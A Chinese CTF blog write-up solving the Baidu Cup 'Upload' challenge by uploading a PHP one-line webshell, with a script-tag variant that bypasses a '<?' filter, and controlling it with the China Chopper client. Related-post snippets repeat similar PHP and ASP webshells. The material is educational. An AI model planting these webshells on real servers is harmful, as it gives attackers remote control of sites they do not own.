“百度杯”CTF比赛 九月场Upload 之菜刀的使用

最新推荐文章于 2024-05-04 18:59:47 发布
最新推荐文章于 2024-05-04 18:59:47 发布
阅读量771 收藏 5
点赞数 1
文章标签: 菜刀 一句话 百度杯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42764906/article/details/90277138
版权

最近越学习 越感觉自己菜
然而 这并不是重点 然而 我有一颗上进的心 哈哈哈
敲黑板 划重点了
我们把没用的地方删掉 直接进入菜刀方法解决这道题
在这里插入图片描述
题干不是白给的
上传一句话木马

<?php 
eval($_POST['a']);
?>

发现 过滤掉<?
于是想办法绕过

在网上找到一个一句话,修改后如下

<script language="pHp">@eval($_POST['sb'])</script>

(我也不知道他为啥会绕过<? 咱也不知道 咱也不敢问
解答如下:
在这里插入图片描述
首先你得有菜刀工具(不提供下载)
将代码放入记事本中 更改后缀名字(没有后缀名的百度)
得到
在这里插入图片描述
(注:一定要改成英文名上传 感谢 宋 * 皓的 指点)
在这里插入图片描述在这里插入图片描述

点击上传成功
得到
在这里插入图片描述看似啥也没有URL里暗藏玄机

URL:http://07828801469b45f8bef5f502193dbb24df998587f48a4749.changame.ichunqiu.com/u/ppp.php

打开菜刀 划重点
前提要知道 网站shell地址就是文件的地址(即此次URL),后边的那个小框填的是你的一句话的密码
密码是
在这里插入图片描述
这个sb
在这里插入图片描述
打开菜刀
右键 添加
在这里插入图片描述添加这个URL
如图
在这里插入图片描述双击新添加的
得到

在这里插入图片描述
得到flag

参考文章:
李 * 宇 大佬辅助(本题解法):https://blog.csdn.net/qq_43473164/article/details/90270662
李 * 宇 大佬辅助(菜刀使用):https://blog.csdn.net/weixin_43716322/article/details/89641490
官方解答:https://www.ichunqiu.com/writeup/detail/1185
网上菜刀使用方法1:https://blog.csdn.net/sinat_21184471/article/details/74202665
网上菜刀使用方法2:https://blog.csdn.net/netuser1937/article/details/53738686

后记:本篇文章感谢李 * 宇 大佬的多次讲解 在此表示感谢!!!

qq_42764906
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
百度CTF比赛 九月 upload
drip_big的博客
04-10 422
百度CTF比赛 九月 题目内容: 想怎么传就怎么传,就是这么任性。 tips:flag在flag.php中 测试可以上传文件类型 .txt .php.js 都可以上传成功 说明在上传文件的过程中并无拦截 题目中的“想怎么传就怎么传”说的没错 构造php脚本 既然有提示“tips:flag在flag.php中 ”,故只要可以阅读flag.php的内容即可。 <?php // get...
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1773
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
CTF竞赛实战 中国菜刀一句话木马
热门推荐
keep coding
05-05 7万+
中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&amp;uk=388464620一.基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录二.实战asp的一句话是:&lt;%eval request ("pass")%&gt;aspx的一句话是:&lt;%@ P...
中国菜刀使用教程--ctf 文件上传
weixin_40729735的博客
11-07 5594
首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script language="pHp">@eval($_POST['sb'])</script> 打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb) 点击...
BUUCTF---misc---菜刀666
最新发布
2201_75556700的博客
05-04 593
7、将z2后面的十六进制保存在新建的txt文件中,用010编辑器导入十六进制即txt,后保存为jpg,得到照片。8、接着将流量包分离出压缩包,得到一个flag.txt,需要密码。5、追踪http数据流,发现z2后面是一个jpg文件的文件头。2、题目说是菜刀,联想到http协议的post方法。1、下载附件,在wireshark中分析。6、往下滑,发现提示有txt文件和压缩包。9、使用照片中提示的密码,得到flag。4、打开数据包,发现有个不一样。这里面有一大串的数据包。
BUUCTF MISC 菜刀 解题过程记录
m0_73897659的博客
11-03 377
发现一个flag.txt,但是我发现有密码,试过了暴力破解无效,我想应该密码还得找,于是我开始分析数据包,在看了很久之后,依然没什么头绪,所以我看了一下wp(别喷),题解说要用到一个命令过滤POST的http流,于是乎,我又百度。首先下载附件得到一个压缩包,里面有个文件叫666666.pcapng,看到文件格式首先就是想到流量分析,但是不明白菜刀什么意思,所以我百度了一下。然后发现FFD8,意识到可能有jpg,我拉到最下面发现FFD9,所以没猜错,将十六进制文本提取并写入010,另存为1.jpg。
BUUCTF-菜刀666
m0_63563528的博客
04-01 2693
BUUCTF-菜刀666,使用工具:wireshark,010editor
记录CTF misc之菜刀流量分析
黑面狐
01-22 9803
一、前言 昨天参加了一CTF比赛,做了一道菜刀流量分析的题目,因为之前流量分析这块不是很熟悉,加上实战CTF也比较少走了不少弯路。 二、流量分析 菜刀是常见的连接webshell的工具,连接webshell会有明显的GET或POST请求。所以我们只需要找数据包的HTTP请求就行了。 找到第一个HTTP请求,选择追踪HTTP流,进行分析 我们看到webshell就是/upload
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
用于备份CTF比赛题目,仅队内复现使用.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
领航 CTF 2021 决赛 真题 7z
12-07
领航 CTF 2021 决赛
逆向实战之CTF比赛篇.zip
10-01
比赛项目源码
CTF和AWD比赛使用的题目的docker环境.zip
09-30
比赛项目源码
BUUCTF MISC 41-60
qq_52696970的博客
03-17 1062
BUUCTF MISC 41-60
BUUCTF 菜刀666 1
YueXuan_521的博客
11-21 411
BUUCTF 菜刀666 1
有关ctf的一些工具(随学习进程持续更新)
qq_40279081的博客
03-13 5190
1.vmware虚拟机以及kali系统 kali系统个人感觉类似工具箱,什么工具都有,还需要不断探索 2.burpsuite http抓包工具目前用在get,host一类的题上(其实它的功能个人感觉挺强大的只是我目前小白不太会用) 3.中国菜刀,蚁剑 他俩差不多,现在多用蚁剑,菜刀好像停止维护了用它做过连接一句话木马的题 蚁剑的github地址(比较官方,之前有很多有后门的,注意辨别) GitHub - AntSwordProject/antSword: 中国蚁剑是一款跨平台的开源网站管理工具
BugkuCTF之分析题之中国菜刀
A_dmin的博客
12-16 4857
BugkuCTF之分析题之中国菜刀 进入点击下载zip文件,解压用wireshark打开。 搜索HTTP. 点击第一个http包,选择复制纯文本。 去掉头尾,在尾部加上==,用BASE64解码 逐个分析。 看着$D应该是显示文件啥的!! 继续走! 第二个是个显示的文本,好像没啥,继续! 第三个: 同第一个解码: 好像是显示3.php里的内容的。继续走!! 分析第4个http包: ...
bugkuctf-分析-菜刀
wuerror的博客
02-01 1166
1.打开下载的压缩包,里面是个pcapng文件。用wireshark打开。 先看看http 包比较少而且info里也没什么特别的信息,每个点开看看 在第四个包里发现了一句话,重点来了! 看下一个包,他做了什么。选中第五个包,右键选择追踪HTTP流 base64解码$xx(' ')引号内的内容 发现他尝试读取flag.tar.gz文件,且在头尾输出了X@Y.接着看第六个H...
CTF-web 第五部分 简单的上传绕过与中国菜刀
iamsongyu的博客
10-12 7795
对于上传文件来说,通常会采用的几种方式如下:客户端文件类型检测,客户端文件内容检测,服务器端检测。对于这几种检测,我们通常使用的策略是使用burp suite进行修改,或者是对文件扩展名进行变化等。常用的景是通过上传漏洞,将一句话木马传到服务端,然后在进一步渗透服务器。 (1)客户端文件类型检测 php的exist file_get reaquire include等存在00截断漏洞 php&l...
php upload ctf,强网CTF防御赛ez_upload Writeup
05-14
move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值